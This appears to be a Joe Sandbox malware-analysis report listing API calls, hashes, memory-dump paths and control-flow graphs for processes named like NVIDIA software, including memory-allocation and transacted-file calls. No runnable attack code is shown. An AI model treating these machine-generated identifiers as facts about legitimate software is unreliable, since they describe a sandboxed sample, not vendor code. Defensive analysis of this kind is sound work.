                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
                                                            • Instruction ID: 528b68e383d7d2e985ceb3394e070aaf384fcab9c4249081fc2a5a519314684d
                                                            • Opcode Fuzzy Hash: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
                                                            • Instruction Fuzzy Hash: 3221C67290431A5ADB32DB68D844FABB3FCEF95750F04046AE6C0C7145EB6DD94883A2
                                                            APIs
                                                              • Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
                                                              • Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,0100F33E), ref: 0100F3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 0100F389
                                                            • CryptUnprotectMemory failed, xrefs: 0100F3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
                                                            • Instruction ID: 88968022f55c8b13e60e87dd97a202f24e5968efcf44f9cbcf7f2f7151350bc2
                                                            • Opcode Fuzzy Hash: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
                                                            • Instruction Fuzzy Hash: C5110631A0062B6BFB33AB24D881A6E3B98FF00670F04C157FCC15F2D5DA75A9419791
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0100B9B8
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
                                                            • Instruction ID: db617449798f4af6a5e0494c7b9b00353db38c05a3b0950266c7a506ce3bb9a3
                                                            • Opcode Fuzzy Hash: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
                                                            • Instruction Fuzzy Hash: 9201F56750032379FA72AB7D8C84DABB7ECEE96670F40491BF5C4D60C1EA34D48482B1
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,01011160,?,00000000,00000000), ref: 01011043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 0101108A
                                                              • Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
                                                            • Instruction ID: 206cfdbbd0883072cb6439eb0a098a7f4a1882cda37c427025e3a8e6eed6be5e
                                                            • Opcode Fuzzy Hash: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
                                                            • Instruction Fuzzy Hash: 3201A7F574430A6BE2355E749C91BB6B399EB40651F10002EF6C65A285CAF668848624
                                                            APIs
                                                              • Part of subcall function 0100E2E8: _swprintf.LIBCMT ref: 0100E30E
                                                              • Part of subcall function 0100E2E8: _strlen.LIBCMT ref: 0100E32F
                                                              • Part of subcall function 0100E2E8: SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
                                                              • Part of subcall function 0100E2E8: GetWindowRect.USER32(?,?), ref: 0100E3C9
                                                              • Part of subcall function 0100E2E8: GetClientRect.USER32(?,?), ref: 0100E3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                            • SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
                                                            • Instruction ID: 65b811ef1a5752bd3bbe4d2a0fe35db3247a4442338e297b6d4ecb649b1af4a4
                                                            • Opcode Fuzzy Hash: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
                                                            • Instruction Fuzzy Hash: 75F03C7010438CABFF671F64C80DAEA3FA9AB44355F048554FDC8595E1CB79C5909B50
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
                                                            • GetLastError.KERNEL32(?), ref: 01010FF6
                                                              • Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 01010FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
                                                            • Instruction ID: 51e0d02caec95f89a0b6c173f2cde64c3ea88b909fc38d0b2ed7971a485457a1
                                                            • Opcode Fuzzy Hash: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
                                                            • Instruction Fuzzy Hash: ECD02B71A0453537D52232349C44DBE7809DB21331F104B04F1B8592D9CA6A49514791
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,0100DA55,?), ref: 0100E2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0100DA55,?), ref: 0100E2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
                                                            • Instruction ID: 2d604e4db904fe36c96a5bc6f3f98bf81548d637e8a196ca89d90fe7ac456572
                                                            • Opcode Fuzzy Hash: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
                                                            • Instruction Fuzzy Hash: 3FC0123164071066F63016656D9DB43AE5C6B00B11F05044CB2C1ED1C5D6AAC48187A0

                                                            Execution Graph

                                                            Execution Coverage:2.5%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:4
                                                            Total number of Limit Nodes:0
                                                            execution_graph 17786 7ff848f10750 17787 7ff848f237f0 17786->17787 17788 7ff848f23b4d VirtualAlloc 17787->17788 17789 7ff848f23ba5 17788->17789

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2123601338.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f10000_NVIDIA Container.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: e5a7d5ed74c3456665513d535406e9c9f666e354a49c0efccd189191c23c4758
                                                            • Instruction ID: b0bf94089c0d14e29eb4c5ffbd4ded8cf149b3ab95fc62a6d321a7e1cba9024d
                                                            • Opcode Fuzzy Hash: e5a7d5ed74c3456665513d535406e9c9f666e354a49c0efccd189191c23c4758
                                                            • Instruction Fuzzy Hash: 36F1AF7091C68D8FDB85EF68D855AEDBBF0FF59300F0001AAE449D3292DB35A985CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 118 7ff848f10730-7ff848f2380b 123 7ff848f2380d 118->123 124 7ff848f23812-7ff848f23865 118->124 123->124 127 7ff848f2386c-7ff848f238b9 124->127 128 7ff848f23867 124->128 131 7ff848f238bb 127->131 132 7ff848f238c0-7ff848f238e7 127->132 128->127 131->132 134 7ff848f238e9 132->134 134->134 135 7ff848f238eb-7ff848f23910 134->135 137 7ff848f23912 135->137 138 7ff848f23917-7ff848f23988 call 7ff848f10988 135->138 137->138 142 7ff848f2398a 138->142 143 7ff848f2398f-7ff848f23998 138->143 142->143 144 7ff848f23a2a-7ff848f23a87 143->144 145 7ff848f2399e-7ff848f23a23 call 7ff848f21ac0 call 7ff848f10858 call 7ff848f11350 143->145 149 7ff848f23a89 144->149 145->144 149->149 151 7ff848f23a8b-7ff848f23ba3 VirtualAlloc 149->151 162 7ff848f23bab-7ff848f23c0f 151->162 163 7ff848f23ba5 151->163 163->162
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2123601338.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f10000_NVIDIA Container.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 1f8c4caf9c82ec01cc04206f06bfe1da02c2bce9511ee6ded9116b34113b20e4
                                                            • Instruction ID: f8f5661888c6745d8b65fcfd85f0a3a4d327779b20d5e5e92af059220be59558
                                                            • Opcode Fuzzy Hash: 1f8c4caf9c82ec01cc04206f06bfe1da02c2bce9511ee6ded9116b34113b20e4
                                                            • Instruction Fuzzy Hash: 93E19F7091C68D8FDB95EF68D895BE9BBF0FF59300F0001AAD449D3292DB35A985CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 168 7ff848f10750-7ff848f2380b 170 7ff848f2380d 168->170 171 7ff848f23812-7ff848f23865 168->171 170->171 174 7ff848f2386c-7ff848f238b9 171->174 175 7ff848f23867 171->175 178 7ff848f238bb 174->178 179 7ff848f238c0-7ff848f238e7 174->179 175->174 178->179 181 7ff848f238e9 179->181 181->181 182 7ff848f238eb-7ff848f23910 181->182 184 7ff848f23912 182->184 185 7ff848f23917-7ff848f23988 call 7ff848f10988 182->185 184->185 189 7ff848f2398a 185->189 190 7ff848f2398f-7ff848f23998 185->190 189->190 191 7ff848f23a2a-7ff848f23a87 190->191 192 7ff848f2399e call 7ff848f21ac0 190->192 196 7ff848f23a89 191->196 194 7ff848f239a3-7ff848f23a23 call 7ff848f10858 call 7ff848f11350 192->194 194->191 196->196 198 7ff848f23a8b-7ff848f23ba3 VirtualAlloc 196->198 209 7ff848f23bab-7ff848f23c0f 198->209 210 7ff848f23ba5 198->210 210->209
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2123601338.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff848f10000_NVIDIA Container.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 299bab268b4494b41ab961bdccd76e1954e7fb09ed1b7a8bdc88ee5661b38cfd
                                                            • Instruction ID: 2a9435ee20f51188dea3b0980ff536d71b55b1b4db7151a8278117f985711609
                                                            • Opcode Fuzzy Hash: 299bab268b4494b41ab961bdccd76e1954e7fb09ed1b7a8bdc88ee5661b38cfd
                                                            • Instruction Fuzzy Hash: 54E1907091C68D8FDB95EF68D845BE9BBF0FF59300F0001AAD449D3292DB35A985CB81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2126356884.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff8490c0000_NVIDIA Container.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a49597f9726d901023b83eb40db20cce7044491fc234da23002aa684ebb3bb9
                                                            • Instruction ID: f1b9f63e89ce49cfeadb82bc192e4b473d61a3c1db7daa98f4d3cc977933db39
                                                            • Opcode Fuzzy Hash: 4a49597f9726d901023b83eb40db20cce7044491fc234da23002aa684ebb3bb9
                                                            • Instruction Fuzzy Hash: C0619F31D0D68A9FEB58EFA4C495AFABBB0FF54344F14017AD009D729ADF38A8418B40
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2126356884.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff8490c0000_NVIDIA Container.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee38a10767a3e1a7746230949e44b3c2f7ea3244eaf749ce7867c2f0ad3b0414
                                                            • Instruction ID: e0445e96cbc693ae12af5b088a3d9fdf5fe993edc132f9b9ebcce63120bde9d2
                                                            • Opcode Fuzzy Hash: ee38a10767a3e1a7746230949e44b3c2f7ea3244eaf749ce7867c2f0ad3b0414
                                                            • Instruction Fuzzy Hash: 04117070D0944B8FDB69EF58C06DABA77E1FF94341F144279D10AEB296CE38B9458B80

                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:40%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:15
                                                            Total number of Limit Nodes:0
                                                            execution_graph 47270 7ff848f23a6d 47271 7ff848f23a89 VirtualAlloc 47270->47271 47273 7ff848f23ba5 47271->47273 47274 7ff848f2207e 47275 7ff848f2208d VirtualProtect 47274->47275 47277 7ff848f221cd 47275->47277 47286 7ff848f796f1 47287 7ff848f79743 GetSystemInfo 47286->47287 47289 7ff848f79815 47287->47289 47266 7ff848f76b21 47267 7ff848f76b3f WriteFile 47266->47267 47269 7ff848f76caf 47267->47269 47278 7ff848f767c1 47279 7ff848f767df CreateFileTransactedW 47278->47279 47281 7ff848f769b8 47279->47281

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff848f2b6bd-7ff848f2b6f8 1 7ff848f2b6fa 0->1 2 7ff848f2b6ff-7ff848f2b75f 0->2 1->2 6 7ff848f2b76d-7ff848f2b77c 2->6 7 7ff848f2b761 2->7 8 7ff848f2b77e 6->8 9 7ff848f2b783-7ff848f2b78c 6->9 7->6 8->9 10 7ff848f2b7b9-7ff848f2b814 9->10 11 7ff848f2b78e-7ff848f2b79d 9->11 24 7ff848f2b81b-7ff848f2bab4 10->24 25 7ff848f2b816 10->25 12 7ff848f2b79f 11->12 13 7ff848f2b7a4-7ff848f2d125 call 7ff848f2e346 11->13 12->13 19 7ff848f2d130-7ff848f2d1f9 13->19 20 7ff848f2d127-7ff848f2d12f call 7ff848f2e346 13->20 39 7ff848f2d1ff-7ff848f2d2fd 19->39 40 7ff848f2d306-7ff848f2d35e 19->40 20->19 161 7ff848f2c79e-7ff848f2c7ab 24->161 25->24 39->40 88 7ff848f2d2ff 39->88 53 7ff848f2d364-7ff848f2d3af 40->53 54 7ff848f2d4f5-7ff848f2d5d1 40->54 65 7ff848f2d4dc-7ff848f2d4e9 53->65 95 7ff848f2d6b2-7ff848f2d6f8 54->95 96 7ff848f2d5d7-7ff848f2d6b0 call 7ff848f2b2a8 54->96 66 7ff848f2d4ef-7ff848f2d4f0 65->66 67 7ff848f2d3b4-7ff848f2d3c2 65->67 73 7ff848f2d8ad-7ff848f2d90c 66->73 71 7ff848f2d3c9-7ff848f2d449 67->71 72 7ff848f2d3c4 67->72 89 7ff848f2d44b 71->89 90 7ff848f2d450-7ff848f2d4ca 71->90 72->71 91 7ff848f2dbd4-7ff848f2dc01 73->91 88->40 89->90 129 7ff848f2d4cc-7ff848f2d4d1 90->129 130 7ff848f2d4d4-7ff848f2d4d9 90->130 102 7ff848f2d911-7ff848f2d94d 91->102 103 7ff848f2dc07-7ff848f2dc2b call 7ff848f2e3a9 91->103 115 7ff848f2d6ff-7ff848f2d705 95->115 96->115 112 7ff848f2d96a-7ff848f2dbd1 102->112 113 7ff848f2d94f-7ff848f2d966 102->113 126 7ff848f2dc2d 103->126 127 7ff848f2dc34-7ff848f2dc68 103->127 112->91 113->112 120 7ff848f2d89a-7ff848f2d8a7 115->120 120->73 125 7ff848f2d70a-7ff848f2d718 120->125 131 7ff848f2d71a 125->131 132 7ff848f2d71f-7ff848f2d7bf 125->132 126->127 135 7ff848f2dc6a-7ff848f2dc77 127->135 136 7ff848f2dc88-7ff848f2dca5 127->136 129->130 130->65 131->132 186 7ff848f2d82f-7ff848f2d857 132->186 187 7ff848f2d7c1-7ff848f2d7e9 132->187 139 7ff848f2dc79 135->139 140 7ff848f2dc7e-7ff848f2dc86 135->140 144 7ff848f2dcab-7ff848f2dd14 136->144 145 7ff848f2de64-7ff848f2de68 136->145 139->140 140->136 190 7ff848f2dd5d-7ff848f2dda9 144->190 191 7ff848f2dd16-7ff848f2dd5c 144->191 149 7ff848f2de6e-7ff848f2de77 145->149 150 7ff848f2e177-7ff848f2e1cf 145->150 152 7ff848f2de79-7ff848f2de7e 149->152 153 7ff848f2de81-7ff848f2de8a 149->153 179 7ff848f2e337-7ff848f2e344 150->179 180 7ff848f2e1d5-7ff848f2e26a 150->180 152->153 159 7ff848f2e161-7ff848f2e171 153->159 159->150 164 7ff848f2de8f-7ff848f2dea0 159->164 162 7ff848f2bab9-7ff848f2bac7 161->162 163 7ff848f2c7b1-7ff848f2c7bc 161->163 171 7ff848f2bac9 162->171 172 7ff848f2bace-7ff848f2bb3b 162->172 174 7ff848f2c81b-7ff848f2c855 163->174 175 7ff848f2c7be-7ff848f2c7f3 163->175 169 7ff848f2dea2 164->169 170 7ff848f2dea7-7ff848f2df47 164->170 169->170 230 7ff848f2df4d-7ff848f2dfad 170->230 231 7ff848f2e153-7ff848f2e15b 170->231 171->172 172->161 202 7ff848f2c882-7ff848f2c8ad 174->202 203 7ff848f2c857-7ff848f2c85b 174->203 206 7ff848f2c8b0-7ff848f2c8b6 175->206 180->179 237 7ff848f2e270-7ff848f2e281 180->237 197 7ff848f2d859 186->197 198 7ff848f2d85e-7ff848f2d887 186->198 193 7ff848f2d7eb 187->193 194 7ff848f2d7f0-7ff848f2d82d 187->194 190->145 225 7ff848f2ddaf-7ff848f2ddbb 190->225 191->190 193->194 217 7ff848f2d892-7ff848f2d897 194->217 197->198 198->217 202->206 203->202 211 7ff848f2c85d-7ff848f2c87f 203->211 215 7ff848f2c7f8-7ff848f2c81a 206->215 216 7ff848f2c8bc-7ff848f2c8fe 206->216 211->202 215->174 236 7ff848f2cb4c-7ff848f2cb52 216->236 217->120 225->145 229 7ff848f2ddc1-7ff848f2de59 225->229 229->145 252 7ff848f2dfaf 230->252 253 7ff848f2dfb4-7ff848f2dfbd 230->253 231->159 239 7ff848f2cb58-7ff848f2cbb1 236->239 240 7ff848f2c903-7ff848f2ca4b 236->240 242 7ff848f2e288-7ff848f2e335 237->242 243 7ff848f2e283 237->243 257 7ff848f2cc40-7ff848f2cc97 239->257 258 7ff848f2cbb7-7ff848f2cc03 239->258 302 7ff848f2cadd-7ff848f2cae1 240->302 303 7ff848f2ca51-7ff848f2cadb 240->303 242->179 243->242 252->253 254 7ff848f2e12c-7ff848f2e13a 253->254 255 7ff848f2dfc3-7ff848f2e01b 253->255 262 7ff848f2e13c 254->262 263 7ff848f2e141-7ff848f2e149 254->263 278 7ff848f2e021-7ff848f2e04d 255->278 279 7ff848f2e0a7-7ff848f2e0d5 255->279 286 7ff848f2d0f7-7ff848f2d0fd 257->286 258->257 262->263 267 7ff848f2e14b-7ff848f2e150 263->267 267->231 283 7ff848f2e04f 278->283 284 7ff848f2e054-7ff848f2e0a2 278->284 281 7ff848f2e0dc-7ff848f2e12a 279->281 282 7ff848f2e0d7 279->282 281->267 282->281 283->284 284->267 290 7ff848f2cc9c-7ff848f2cd3a 286->290 291 7ff848f2d103-7ff848f2d11b 286->291 310 7ff848f2cd6a-7ff848f2cd79 290->310 311 7ff848f2cd3c-7ff848f2cd5f 290->311 291->20 304 7ff848f2cae3-7ff848f2cb15 302->304 305 7ff848f2cb17-7ff848f2cb2a 302->305 313 7ff848f2cb2b-7ff848f2cb49 303->313 304->313 305->313 315 7ff848f2cd7b 310->315 316 7ff848f2cd80-7ff848f2cd8f 310->316 311->310 313->236 315->316 318 7ff848f2cd91-7ff848f2cd9f 316->318 319 7ff848f2cda4-7ff848f2cdbf 316->319 320 7ff848f2d0d6-7ff848f2d0f4 318->320 321 7ff848f2cddf-7ff848f2d0cb 319->321 322 7ff848f2cdc1-7ff848f2cddb 319->322 320->286 321->320 322->321
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NM_H$lM_H
                                                            • API String ID: 0-209739149
                                                            • Opcode ID: 5a7c3a2089b750e975485a11191f3a3dec82ae9dafec172bb6f57ef921024933
                                                            • Instruction ID: b49bdce1d0eba6965a67d806dac71464122cb15f2d83770f0e92f08f1cb26d67
                                                            • Opcode Fuzzy Hash: 5a7c3a2089b750e975485a11191f3a3dec82ae9dafec172bb6f57ef921024933
                                                            • Instruction Fuzzy Hash: 3D03C870D0992D8FDB98EB18D895AA9B7B1FF58341F1042E9D00DE3296DB35AE81CF44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
